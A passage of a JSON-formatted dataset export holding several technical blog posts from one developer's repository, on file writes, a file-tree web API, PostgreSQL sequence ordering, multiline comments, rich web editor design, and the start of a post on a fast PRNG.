encourages\nthem to the pit of death. I see two splinters to remove:\n\n1. Linux should offer an atomic file replacement operation that does it all\nright. Theodore argues that it is glib's (and other libraries') task, but I\ndisagree. To me, one of the most common file operations doesn't have its\nsyscall.\n2. Node.js' defaults ought to be improved. `fs.writeFile()` heavily suggests\nbeing used for file updates, and has the default flag of `'w'`. It is a terribly\nill-advised primitive for any use. It should be replaced by `'ax'`, but it\ncannot, because of legacy! I recommend having a warning, and a separate\n`fs.updateFile()` function.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-05-31T19:42:00Z\",\n \"keywords\": \"storage, posix\" }\n</script>\n"
},
{
"alpha_fraction": 0.7522722482681274,
"alphanum_fraction": 0.7571337819099426,
"avg_line_length": 85.01818084716797,
"blob_id": "9406522b5b32e13599c21c62d8cbe6932f8fee4e",
"content_id": "fb839deaf43307fe8a504f66e5060787cf8da592",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4745,
"license_type": "no_license",
"max_line_length": 636,
"num_lines": 55,
"path": "/blog/src/thefiletree-design-log-2.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 2: API\n\nI have implemented the core API, which powers the folder app.\n\n# API\n\nI tried to stay close to WebDAV, even though I will differ from it in one significant fashion: no file locks.\n\n- `GET /`: loads the file type's app (eg, a text editor, or a file browser).\n- `GET /file?app=data`: downloads file content.\n- `GET /?app=data`: gets a JSON list of the folder's contained file names. A `Depth: 0` HTTP header makes it get a map from file names to `{meta: …}`, which contains its metadata. Further depths also include a `{files: …}` key, which is yet again a map from file names to `{meta: …, [files: …]}`. I rely on the depth for fuzzy matching file names in the file browser.\n- `GET /?app=metadata`: obtains the file's metadata as JSON.\n- `PUT /?app=metadata Content-Type: application/json`: replace the file's metadata.\n- `PUT /foo`: upload a file, creating it if necessary.\n- `POST /?op=append&content=… Content-Type: multipart/form-data`: upload several files, creating them if needed.\n- `MKCOL /`: create a folder.\n- `DELETE /`: remove a file.\n\nI will implement `COPY` and `MOVE` in the future; those operations were not supported in the past.\n\nMetadata information is autosaved every 5 seconds when it changed.\n\nI am afraid this whole reimplementation went faster than planned, leaving me in front of the difficult choice that I hoped to delay…\n\n# Synchronized Editing\n\nI wish to support synchronized editing for text and JSON, with index rebasing to preserve intentions. I see it as a WebSocket JSON stream over `/file?op=edit&app=text`. But what library should I use, and with which protocol? Canop is functional and efficient, although it requires centralization (which will remain unavoidable), but full-JSON is not implemented yet, nor are compound atomic transactions, only text. Meanwhile, jsonsync is functional and mostly relies on the JSON Patch standard (and also peer-to-peer, but this is useless in our case), but index rebasing is not implemented yet, and not as efficient as it is for Canop.\n\n(Given proper index rebasing, there is no reason for which we could not support binary editing. However, if you are modifying a binary file, the synchronization cannot know whether the file gets corrupted, as it does not know its semantics, only its serialized form. For instance, a PNG file edited simultaneously may be synchronized to a state where the index rebasing results in an invalid file. To avoid file corruption, I won't provide binary synchronization.)\n\n# Accounts\n\nOne of the large, long-term changes I wanted to include for a long time was **accounts**. In the former implementation of TheFileTree, everyone was anonymous, which both made it implausibly hard to scale (for instance, having private files necessitated passwords, one for each file, and giving access to a file meant sharing that password, which if the password is used on another file, means remembering a lot of passwords,etc…) and hard to sell (I wouldn't pay a subscription for a service that can't remember that I paid it).\n\nHowever, I am unsure of the exact layout I want for the root folder. My initial thoughts:\n\n- app (contains trusted apps, like \"folder\" for file exploration, \"text\" for editing, \"markdown\", \"html\", etc.),\n- lib (shared libraries and assets used by app and the system, like a 404 page),\n- api (fake inaccessible directory; used for actions like api/1/signup; I can probably make it hold manual pages upon GETting),\n- demo (anonymous public access),\n- about (help, manuals, owner information),\n- One of the following:\n - Users are stored at the root (eg. thefiletree.com/espadrine), they cannot use the existing root file names as nick, and that potentially blocks me from creating new root files in the future (unless I reserve all 3-letter alphabetic words). There is no visual clutter though, as you only see folders you can enter.\n - @nick (Twitter syntax, slightly ugly but popular: thefiletree.com/@espadrine). Other options I considered are ~nick (as per httpd, but it just looks ugly, take a look: thefiletree.com/~espadrine), u (storing nicks, for instance thefiletree.com/u/espadrine, the Reddit way; but it encourages calling nicks /u/nick instead of @nick, and it doesn't make it feel like I am treated first-class as a user), usr (but it is 2 chars longer than u), and finally, the comfy unixy home (oh, thefiletree.com/home/espadrine), but it is even longer!.\n- ~ (reserved to allow redirection to user directory, eg. thefiletree.com/~/my/content),\n- favicon.ico,\n- robots.txt,\n- humans.txt.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-01-01T11:05:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.6808355450630188,
"alphanum_fraction": 0.6991336941719055,
"avg_line_length": 36.54103469848633,
"blob_id": "9cf87d68e98783ec69250d496ff806eb629a9e14",
"content_id": "1708445b9b72b1173f06a444bdbb694dcdcc3d70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12403,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 329,
"path": "/blog/src/two-postgresql-sequence-misconceptions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Two PostgreSQL Sequence Misconceptions\n\n✨ *With Examples!* ✨\n\nSome constructs seem more powerful than the promises they make.\n\nPostgreSQL sequences are like that. Many assume it offers stronger properties\nthan it can deliver.\n\nThey trust them to be the grail of SQL ordering, the one-size-fits-all of strict\nserializability. However, there is a good reason Amazon spent design time on\nvector clocks in [Dynamo][], Google invested significantly into [Chubby][], then\n[Percolator][]’s timestamp oracle, then [Spanner][]’s expensive,\natomic-clock-based TrueTime; why Twitter built [Snowflake][], and so many others\nbuilt custom timestamp systems.\n\n[Dynamo]: https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf\n[Chubby]: https://static.googleusercontent.com/media/research.google.com/en//archive/chubby-osdi06.pdf\n[Percolator]: https://storage.googleapis.com/pub-tools-public-publication-data/pdf/36726.pdf\n[Spanner]: https://static.googleusercontent.com/media/research.google.com/en//archive/spanner-osdi2012.pdf\n[Snowflake]: https://developer.twitter.com/en/docs/basics/twitter-ids.html\n\n1. Strict serializability is hard to achieve, especially in a distributed\n system, but even in a centralized system with the possibility of failure.\n2. Developers assume the system is strict-serializable, but it usually is not.\n3. When a system provides timestamps, developers will use those as if they were\n monotonically strictly increasing atomically throughout the distributed\n system, but they often are not, which causes subtle bugs.\n\n## The problem space\n\nTo design your system’s properties right, it is often useful or necessary to\ndetermine the order in which events happened. Ideally, you wish for the **“wall\nclock” order** (looking at your watch), although instantaneity gets tricky when\nevents occur at a distance, even within the same motherboard, but especially\nacross a datacenter, or between cities.\n\nAt the very least, you want to reason about **causal ordering**: when that event\nhappened, did it already see this other event?\n\nA nice property to have, even for a single centralized database, is to give a\nmonotonically increasing identifier for each row. Most PostgreSQL users rely on\nthe `SERIAL` type for that – a sequence. Each insertion will call `nextval()`\nand store an increasing value.\n\nWhat you implicitly want is to list rows by insertion order, Your mental model\nis that each insertion happens at a set “wall clock” time. A first insertion\nwill happen at T0 and set the identifier 1, the next one happens at T1 and get\nnumber 2, and so on. Therefore, _you expect a row with ID N to have causally\nbeen inserted after a row with ID M < N_.\n\nOperational order is a consistency constraint strongly associated with isolation\nlevels. A PostgreSQL database can handle multiple simultaneous operations.\n\n_(Side note: I could be talking about threads and locks, but I will not, because\nthose are just tools to achieve properties. PostgreSQL may switch tools to\nbetter meet a given promise (they did so with the serializable level in 2011),\nbut the promise won’t change.)_\n\nBy default, it promises **Read Committed** isolation: a transaction can witness\nthe effects of all transactions that commit “before” it does (but not those that\nhave not committed yet). Their commits are therefore causally ordered by commit\ntime.\n\nHowever, nothing else within a transaction has any causal promise with respect\nto other transactions. The same `SELECT` can yield different values;\nsimultaneous insertions can happen either before, after, or anything in between,\nyour own insertion.\n\nThe highest isolation level PostgreSQL offers is **Serializable** isolation: all\ntransactions are causally ordered; from `BEGIN` to `COMMIT`. Of course,\ntransactions still execute in parallel; but the database makes sure that\neverything that a transaction witnesses can be explained by executing all its\nstatements either after all statements of another transaction, or before all of\nthem. It won’t see a changing state within the execution of the transaction.\n\n_(By the way, PostgreSQL only achieved serializability in 2011, when they\nreleased [version 9.1][] with support for predicate locks. It is hard.)_\n\n[version 9.1]: https://www.postgresql.org/docs/release/9.1.0/\n\nHaving a causal order does not mean that this order follows _real time_: one\ninsertion may complete at 9:30am _after (in causal order)_ another that\ncompletes later at 10:40am. If you want the additional property that the order\nis consistent with wall clock time, you want **[Strict Serializability][]**.\n\n[Strict Serializability]: https://jepsen.io/consistency/models/strict-serializable\n\nHowever, **PostgreSQL makes no claim of Strict Serializability**.\n\nGiven all this, sequences probably feel much weaker than you initially thought.\n\nYou want them to give a continuous set of numbers, but a sequence can yield\nvalues with gaps (1 2 4).\n\nYou want them to give a causal order _(2 was inserted before 3)_, but it can\nyield values out of order (1 3 2).\n\nAll a sequence promises is to give values that have an order. Not a continuous\norder, nor a time order.\n\nLet’s demonstrate both.\n\n## Gaps\n\nLet’s create a table with a `SERIAL` identifier. For the purpose of showing\nthings going right, let’s insert a row.\n\n```sql\nCREATE TABLE gaps (id SERIAL);\nBEGIN;\nINSERT INTO order DEFAULT VALUES;\nSELECT * FROM gaps;\n```\n\n id \n ----\n 1\n (1 row)\n\nNow comes the gap.\n\n```sql\nBEGIN;\nINSERT INTO order DEFAULT VALUES;\nROLLBACK;\n```\n\nSince we rolled back, nothing happened – or did it?\n\nLet’s now insert another row.\n\n```sql\nINSERT INTO order DEFAULT VALUES;\nSELECT * FROM gaps;\n```\n\n id \n ----\n 1\n 3\n (2 rows)\n\nOops! Despite the rollback, the sequence was incremented without being reverted.\nNow, there is a gap.\n\nThis is not a PostgreSQL bug per se: the way sequences are stored, it just does\nnot keep the information necessary to undo the `nextval()` without potentially\nbreaking other operations.\n\nLet’s now break the other assumption.\n\n## Order violation\n\nFirst, a table with a sequence and a timestamp:\n\n```sql\nCREATE TABLE orders (id SERIAL, created_at TIMESTAMPTZ);\n```\n\nLet’s set up two concurrent connections to the database. Each will have the same\ninstructions. I started the first one yesterday:\n\n```sql\n-- Connection 1\nBEGIN;\n```\n\nI launch the second one today:\n\n```sql\n-- Connection 2\nBEGIN;\nINSERT INTO orders (created_at) VALUES (NOW());\nCOMMIT;\n```\n\nLet’s go back to the first one:\n\n```sql\n-- Connection 1\nINSERT INTO orders (created_at) VALUES (NOW());\nCOMMIT;\n```\n\nSimple enough. But we actually just got the order violation:\n\n```sql\nSELECT * FROM orders ORDER BY created_at;\n```\n\n id | created_at \n ----+-------------------------------\n 2 | 2019-09-04 21:10:38.392352+02\n 1 | 2019-09-05 08:19:34.423947+02\n\nThe order of the sequence does not follow creation order.\n\nFrom then on, developers may write some queries ordering by ID, and some\nordering by timestamp, expecting an identical order. That incorrect assumption\nmay break their business logic.\n\nLest you turn your heart to another false god, that behavior remains the same\nwith serializable transactions.\n\n## Are we doomed?\n\nNo.\n\nSure, the systems we use have weak assumptions. But that is true at every level.\nThe nice thing about the world is that you can combine weak things to make\nstrong things. Pure iron is ductile, and carbon is brittle, but their alloy is\nsteel.\n\nFor instance, you can get the best of both worlds, causal order and “wall clock”\ntimestamps, by having a `TIMESTAMPTZ` field, only inserting rows within\nserializable transactions, and setting the `created_at` field to now, or after\nthe latest insertion:\n\n```sql\nBEGIN ISOLATION LEVEL SERIALIZABLE;\nINSERT INTO orders (created_at)\nSELECT GREATEST(NOW(), MAX(created_at) + INTERVAL '1 microsecond') FROM orders;\nCOMMIT;\n```\n\nIndeed, PostgreSQL’s `TIMESTAMPTZ` has a precision up to the microsecond. You\ndon’t want to have conflicts in your `created_at` (otherwise you could not\ndetermine causal order between the conflicting rows), so you add a microsecond\nto the current time if there is a conflict.\n\nHowever, here, concurrent operations are likely to fail, as we acquire a\n(non-blocking) SIReadLock on the whole table (what the documentation calls a\nrelation lock):\n\n```sql\nSELECT l.mode, l.relation::regclass, l.page, l.tuple, substring(a.query from 0 for 19)\nFROM pg_stat_activity a JOIN pg_locks l ON l.pid = a.pid\nWHERE l.relation::regclass::text LIKE 'orders%'\n AND datname = current_database()\n AND granted\nORDER BY a.query_start;\n```\n\n mode | relation | page | tuple | substring\n ------------------+----------+------+-------+--------------------\n SIReadLock | orders | | | INSERT INTO orders\n RowExclusiveLock | orders | | | INSERT INTO orders\n AccessShareLock | orders | | | INSERT INTO orders\n\nThe reason for that is that we perform a slow Seq Scan in this trivial example,\nas the [EXPLAIN][] proves.\n\n QUERY PLAN\n -------------------------------------------------------------------------------\n Insert on orders (cost=38.25..38.28 rows=1 width=8)\n -> Aggregate (cost=38.25..38.27 rows=1 width=8)\n -> Seq Scan on orders orders_1 (cost=0.00..32.60 rows=2260 width=8)\n\n[EXPLAIN]: https://www.postgresql.org/docs/current/using-explain.html\n\nWith an [index][], concurrent operations are much more likely to work:\n\n[index]: https://www.postgresql.org/docs/current/sql-createindex.html\n\n```sql\nCREATE INDEX created_at_idx ON orders (created_at);\n```\n\nWe then only take a tuple lock on the table:\n\n mode | relation | page | tuple | substring \n ------------------+----------+------+-------+--------------------\n SIReadLock | orders | 0 | 5 | INSERT INTO orders\n RowExclusiveLock | orders | | | INSERT INTO orders\n AccessShareLock | orders | | | INSERT INTO orders\n\nHowever, the tuple in question is the latest row in the table. Any two\nconcurrent insertions will definitely read from the same one: the one with the\nlatest `created_at`. Therefore, only one of concurrent insertion will succeed;\nthe others will need to be retried until they do too.\n\n## Subset Ordering\n\nIn cases where you only need a unique ordering for a subset of rows based on\nanother field, you can set a combined index with that other field:\n\n```sql\nCREATE TABLE orders (\n account_id UUID DEFAULT gen_random_uuid(),\n created_at TIMESTAMPTZ);\nCREATE INDEX account_created_at_idx ON orders (account_id, created_at DESC);\n```\n\nThen the [query planner][EXPLAIN] goes through the account index:\n\n```sql\nINSERT INTO orders (account_id, created_at)\nSELECT account_id, GREATEST(NOW(), created_at + INTERVAL '1 microsecond')\nFROM orders WHERE account_id = '9c99bef6-a05a-48c4-bba3-6080a6ce4f2e'::uuid\nORDER BY created_at DESC LIMIT 1\n```\n\n QUERY PLAN\n -----------------------------------------------------------------------------------------------------------------------\n Insert on orders (cost=0.15..3.69 rows=1 width=24)\n -> Subquery Scan on \"*SELECT*\" (cost=0.15..3.69 rows=1 width=24)\n -> Limit (cost=0.15..3.68 rows=1 width=32)\n -> Index Only Scan using account_created_at_idx on orders orders_1 (cost=0.15..28.35 rows=8 width=32)\n Index Cond: (account_id = '9c99bef6-a05a-48c4-bba3-6080a6ce4f2e'::uuid)\n\nAnd concurrent insertions on different accounts work:\n\n mode | relation | page | tuple | substring\n ------------------+----------+------+-------+--------------------\n SIReadLock | orders | 0 | 1 | INSERT INTO orders\n RowExclusiveLock | orders | | | INSERT INTO orders\n AccessShareLock | orders | | | INSERT INTO orders\n SIReadLock | orders | 0 | 2 | COMMIT;\n\n(The first three row are from one not-finished transaction on account 1, the\nlast is from a finished one on account 2.)\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2019-09-05T17:28:59Z\",\n \"keywords\": \"sql\" }\n</script>\n"
},
{
"alpha_fraction": 0.7636743187904358,
"alphanum_fraction": 0.7707724571228027,
"avg_line_length": 65.52777862548828,
"blob_id": "b4a4e8875794862bf1ba09a782ec9c881a5c323c",
"content_id": "d312cf03fd104f80eee10debff652bb144013a8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2395,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 36,
"path": "/blog/src/multiline-comments-do-without.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Multiline comments: do without\n\nLately, while working on my [autocompletion system](https://github.com/espadrine/aulx), I kept struggling with multiline comments.\nObviously, you don't want dot completion in a comment.\nThen, I started wondering about how useful multiline comments are, at all.\n\nThere are three use-cases for multiline comments.\n\n1. Normal comments,\n2. Comment a block of code effortlessly,\n3. Automated documentation (JavaDoc, JSDoc, etc.)\n\nThe point that I wish to make is that none of those make multiline comments relevant. Some even have inherent deficiencies and edge-cases.\n\nNormal comments can always be managed by single-line comments.\nIt seems that you can always convert your multiline comments into single-line comments with no trouble at all. The reverse operation, converting single-line comments to multiline, is not always possible.\n\nCommenting a block of code can also be handled by single-line comments. If it isn't just as effortless as using multiline comments, your text editor is lacking. It is hugely easy on Vi and Emacs, and on any good text editor.\n\n- Vi: in visual mode, select the lines you want to comment. Press the colon key, and type the following command: `s,^,//,`. That command replaces the start of the line with a double slash.\n- Emacs: select the lines you want to comment. Enter CTRL+X, R, T (in this order). At the prompt that appears, enter `//`. Double slashes appear at the start of each line.\n\nWorse than that, multiline comments can fail. If the block of code contains a string, or a regex, that includes the closing sequence of characters (for instance, \"*/\"), then the comment stops there. You have no recourse. Furthermore, in most programming languages, multiline comments don't even nest: if your block of code has one, you can't comment it.\n\nFinally, documentation. I see no reason why automatic documentation tools cannot deal with single-line comments. Furthermore, the mere idea that you are not allowed to write \"*/\" in your documentation is preposterous.\n\nIf you create a new language, please remember: adding multiline comments is a mistake.\n\nIf you use a language with multiline comments that rely on a closing sequence, avoid them like a disease.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-02-04T20:22:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7271062135696411,
"alphanum_fraction": 0.7594627737998962,
"avg_line_length": 62,
"blob_id": "0d97d1b05ac897b82180692d75aa754af9891a49",
"content_id": "37a9ebe6cc5d5e9632171a41eb66d62660240e42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1638,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 26,
"path": "/blog/src/what-i-did-in-2015.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Did In 2015\n\n- [Passphrase][], a program to generate [good passphrases][]. Providing the entropy gives intuition into how strong they are, and provides an incentive to learn more.\n- [Email-Login][], a library for passwordless authentication.\n- [Canop][], a synchronization library. It allows collaborative text editing, and will allow offline and history capabilities. While it works with text, I will make it generalize to a JSON data structure, maintained consistent with a centralized server through websockets.\n- [RegList][], a library to compile a list of regexes into a single, fast, regex, while keeping the match groups information. It turns out to not provide the expected speedup, which I hope to dig into in the future.\n\nI did a lot of experimentation in 2015. Many failed projects. I also started a few as-of-yet secret projects which I hope will achieve greatness.\n\nOne of my failings, however, is how little I explain and advertize my projects. Given that 2015 was a year of experimentation, it is not very surprising. 2016 will need to be a year of development, and 2017 a year of marketing.\n\n[Previously][].\n\n[Passphrase]: https://github.com/espadrine/passphrase\n[good passphrases]: https://xkcd.com/936/\n[Email-Login]: https://github.com/espadrine/email-login\n[Canop]: https://github.com/espadrine/canop\n[RegList]: https://github.com/espadrine/reglist\n[Previously]: http://espadrine.tumblr.com/post/106997844921/what-i-made-on-year-2014\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-01-28T20:20:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7347863912582397,
"alphanum_fraction": 0.7384548783302307,
"avg_line_length": 55.16969680786133,
"blob_id": "fabca9db61eda1394c6fc396476e2033cb9c3c54",
"content_id": "621a606ce4c222237728dd33c3838ce2f3a3283c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9328,
"license_type": "no_license",
"max_line_length": 640,
"num_lines": 165,
"path": "/blog/src/rich-web-editors.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Rich Web Editors\n\nHere is what I wish to see in a rich Web editor.\n\n## Features\n\nFirst, **formatting**. At this point, I feel we all agree that there are two major types of formatting currently in use: block and inline. Here are all the corresponding formatting options a light editor should offer, by order of importance.\n\n* Block\n * Paragraph\n * Six heading levels\n * Lists (ordered and unordered, with nesting)\n * Embedded resource (image, audio, video, iframe?)\n * Blockquote\n * Horizontal ruler\n * Code block (optional: could be implemented as a paragraph with code and line breaks)\n* Inline\n * Italic\n * Bold\n * Link\n * Code\n * Line break\n * Strikethrough\n\nSecond, **toolbars** are the bane of my existence. User interfaces should be as clean as they can afford to be. All I should see when editing text is the text I write and a discreet button on the side to click when I am done editing.\n\nThe **editor** should not be a tiny window surrounded by bells and whistles. Ideally, all you should see is your text. If you are editing markup, you should see a live rendering of what you are typing on the side, centered on the equivalent location that your cursor is at.\n\nMost importantly, editing is a **linear process**. It must be possible to specify what we want to write in the order in which we think it. For instance, if I know that the next word is italic, I ought to set italic _before_ I actually write the word. Being forced to first type text, then format it, requires me to keep in mind all the formatting I want as I write, in order to enforce it later. Writing already demands that I strain my memory into preparing what I will write later; no need to strain it further. This is what most makes me enjoy Markdown editing: typing a star, for example, naturally occurs before typing the italic word.\n\nFinally, **performance**: there should never be a moment when we can type faster than text appears on the screen.\n\nNice-to-haves:\n\n1. Automatic conversion of text to the right codepoint (such as quotes `\"` to `“` and `--` to `—`), although you ought to be able to undo that.\n2. Choosing the flow of blocks, between:\n * Normal\n * Centered\n * Half-width; text flows on the right\n * Half-width; text flows on the left\n3. Tables, as a new block type.\n4. Checklist, as a new block type (which Slack provides).\n\n## Solutions\n\nFormatting options should only appear in **contextual modeless popup**. That means it should not force you out of your editing experience. Typing should dismiss the popup. In total, all we need are three distinct popups:\n\n1. Inline formatting\n2. Block formatting\n3. Embedding\n\nWhile editing, there is no need for any popup. **When selecting text**, that popup has three purposes: contextually indicate that you can format that text inline, provide buttons to do so, and hint at the ability to do so in linear editing by providing the shortcuts.\n\n* `Ctrl+I` → Italic\n* `Ctrl+B` → Bold\n* `Ctrl+K` → Link (Medium, Tumblr, Slack, Google Docs, Word)\n* `Ctrl+Shift+K` → Code (Slack)\n* `Shift+Enter` → Line break\n* `Ctrl+Shift+X` → Strikethrough (Slack)\n* `Alt+Shift+5` → Strikethrough (Google Docs)\n* `Ctrl+Shift+6` → Strikethrough (Tumblr)\n\n**When creating a new block**, a different popup should appear, giving you the option to select the block type (along with hinting at keyboard shortcuts). By default, a block should be a paragraph.\n\nChanging the type of an existing block is obvious in hindsight. We are used to double-click to select a word, and to triple-click to select a block. Just like the double-click, the **triple-click** should also show the block formatting popup.\n\n(I thought I was the only one to figure that idea out. To some extent, I am. Medium does rely on triple-click to hide one button: the drop cap.)\n\nUnlike the inline formatting popup, the block one features exclusive options. We can therefore omit the current one, reducing the number of buttons.\n\nSimilarly, when embedding a resource, the resource type can be inferred from the link, which avoids unnecessarily asking what its type is. In fact, a resource embedding-specific popup can appear **whenever we paste a URL**, suggesting either to produce a link, or to embed its target. Ideally, pasting or dropping documents from the desktop should also be supported, and that does not require a popup, as the type can be inferred.\n\nBecause the block popup appears upon creating a new block, it is not as critical to having a linear editing process. Shortcuts are therefore optional. However, the following can ease the most common operations.\n\n* `Ctrl+Alt+0` → Paragraph (Google Docs)\n* `Ctrl+Alt+1` to `6` → Heading (Google Docs, Word, ~Medium, ~Slack)\n* `Ctrl+Shift+2` → Heading (Tumblr)\n* `Ctrl+Shift+7` → Ordered list (Google Docs, Slack, Tumblr)\n* `Ctrl+Shift+8` → Unordered list (Google Docs, Slack, Tumblr)\n* `Tab`, `Shift+Tab` → Increase / decrease nesting in lists\n* `Ctrl+]`, `Ctrl+[` → Same as above (when Tab needs to be used)\n* `Ctrl+Shift+9` → Blockquote (Tumblr)\n* `Ctrl+Alt+K` → Code block (Slack)\n* `Ctrl+R` → Horizontal ruler (Stack Overflow)\n\nHowever, a much greater idea in my opinion is to have **Markdown-like automatic conversion**. It is not a novel idea (Slack did it first, and ProseMirror followed suit).\n\n* `#+Space` → Heading (the number of # determines the header level)\n* `*+Space`, `-+Space` → Unordered list\n* `1.+Space` → Ordered list\n* `>+Space` → Blockquote\n* ```` ```+Space ```` → Code block\n* `----` → Horizontal ruler\n* `![]` → Embedded resource (not part of Slack, but would it not be fancy?)\n* `:emoji:` → Emoji (based on the name). A nice-to-have, most certainly.\n\nGeneral shortcuts that ought to be supported as well:\n\n* `Ctrl+C`, `Ctrl+X`, `Ctrl+V`: copy, cut, paste\n* `Ctrl+Z`, `Ctrl+Shift+Z`, `Ctrl+Y`: undo, redo\n* `Ctrl+Backspace`: delete previous word\n* `Ctrl+Delete`: delete next word\n* `Ctrl+Home`, `Ctrl+End`: go to the start / end of the whole document\n* `Ctrl+F`, `Ctrl+G`: find, find next occurrence\n* `Ctrl+S`: if there is no auto-saving, this should save the document\n* `Ctrl+/`: show shortcuts (Medium, Slack)\n\n## What I have used\n\nI will only point out what is wrong or missed in each implementation.\n\n* [Blogger][]\n * Ugly toolbar\n * Too many formatting options: inline background color for text, inline font change, font size and text justification!\n* [Wikipedia][]\n * Ugly toolbar\n * Not WYSIWYG, with an impenetrable syntax\n * No live preview\n* [Reddit][]\n * Not WYSIWYG, and a custom Markdown that is not CommonMark\n * No live preview\n * Only images can be embedded\n* [Stack Overflow][]\n * Ugly toolbar\n * Only images can be embedded\n* [Tumblr][]\n * The editor is a tiny window in the middle of the screen, with the full app (updating blogs) running in the background — and you can see it by transparency!\n * Single-level heading\n * Illogical separation between block and inline formatting (the block formatter doesn't include block quotes or headings: those are in the inline formatter)\n * Automatic conversion of quotes, but no way to undo that conversion.\n * Audio cannot be embedded\n * Markdown mode: Should use CommonMark (ideally with tables added)\n * Markdown mode: No selection of formatting options appear when selecting text\n * Markdown mode: Only images can be embedded\n * Markdown mode: Only 1-level nesting (guess how I learned that?)\n* [Slack][]\n * Slow and Buggy: on Firefox at least, the cursor frequently breaks, appears at two places, …\n * 3-level heading\n* [Medium][]\n * 3-level heading\n * Illogical separation between block and inline formatting (the block formatter doesn't include block quotes or headings: those are in the inline formatter)\n * Automatic conversion of quotes, but no way to undo that conversion\n * Audio cannot be embedded\n\nI'd rather not include [ProseMirror][] here yet, as it is a beta product. It fares fairly well, although I'd rather not have inline formatting options in the block formatting options (they are present to be used for linear editing (switch to italic before writing the italic word), but the keyboard shortcut is not hinted at). Besides, the always-present hamburger icon used for block formatting could be thrown away. Finally, nested lists are very awkward at the moment (neither tab nor `Ctrl+]` works, for instance).\n\nThe biggest issue facing ProseMirror, however, is the fact that *it does not have a block-level resource embedding object*. Images are only inline. It is convenient to enable emojis, I suppose, but definitely not for most publications. Most images in rich text are a block element, usually centered, sometimes with text flowing on the left or on the right. Almost never is having text aligned with the bottom of the image desirable.\n\n[Blogger]: https://www.blogger.com\n[Wikipedia]: https://www.wikipedia.org/\n[Reddit]: https://www.reddit.com/\n[Stack Overflow]: https://stackoverflow.com/\n[Tumblr]: https://www.tumblr.com/\n[Slack]: https://slack.com/\n[Medium]: https://medium.com/\n[ProseMirror]: http://prosemirror.net/\n\nWhat other improvements would you like to see in user experience?\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-09-26T19:42:00Z\",\n \"keywords\": \"web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7094212174415588,
"alphanum_fraction": 0.7437824606895447,
"avg_line_length": 38.59202575683594,
"blob_id": "fec18b2d09d6b4b8b374111de38756fba4edf954",
"content_id": "b463c31dd0f49c17d048826f4914e91d53a8fcd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 25972,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 652,
"path": "/blog/src/shishua-the-fastest-prng-in-the-world.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# SHISHUA: The Fastest Pseudo-Random Generator In the World\n\n_(TLDR: see the [benchmark](#benchmark) and the [code].)_\n\nSix months ago, I wanted to make the best PRNG with an unconventional design,\nwhatever that design may be.\nI expected it to start easy, and slowly get harder;\nI wondered whether I would learn fast enough to pass the highest bar.\n\nSurprisingly, difficulty did not increase linearly.\nPassing the bytewise Chi-Squared tests was very hard!\n\nThen, when I got the concepts, passing dieharder was also very hard.\nWhen I got to that point, I was honestly so extatic,\nthat [I published what I got][permal-twitter] to learn what the next challenge needed to be.\nBut it turned out [it failed PractRand][permal-fail].\n\nThen, [passing BigCrush][harmonoise-twitter] was very hard.\n\nThen, passing 32 tebibytes of PractRand was very hard.\n\nBut once I reached that point, I realized that speed was going to be an issue.\nIt wasn’t just about having a construction that emitted ten megabytes a second, taking a month to pass PractRand.\n\nBut I have to admit, [passing PractRand at a gigabyte a second][combit] was very hard.\n\nOnce you get there… what you really want to see is whether you can reach the Pareto frontier.\n\nYou want the fastest PRNG in the world that beats the hardest statistical tests.\n\nI got there.\n\nIn [the previous entry to the series][a primer on randomness], I explained all the things I learnt to reach it.\nHere, I’ll detail how the winning design works.\n\n[permal-twitter]: https://mobile.twitter.com/espadrine/status/1184542865969614849\n[permal-fail]: https://mobile.twitter.com/espadrine/status/1184883565634424832\n[harmonoise-twitter]: https://mobile.twitter.com/espadrine/status/1186358084425400320\n[combit]: https://github.com/espadrine/combit\n[a primer on randomness]: https://espadrine.github.io/blog/posts/a-primer-on-randomness.html\n[code]: https://github.com/espadrine/shishua\n\n## Target\n\nLet’s start with the obvious: **speed is platform-dependent**.\nI focused my optimization on the modern x86-64 architecture (so, Intel and AMD chips).\n\nThe classic metric used to compare performance there is **cpb**:\nthe number of CPU cycles spent to generate a byte of output.\nAll cryptographic papers [compute and 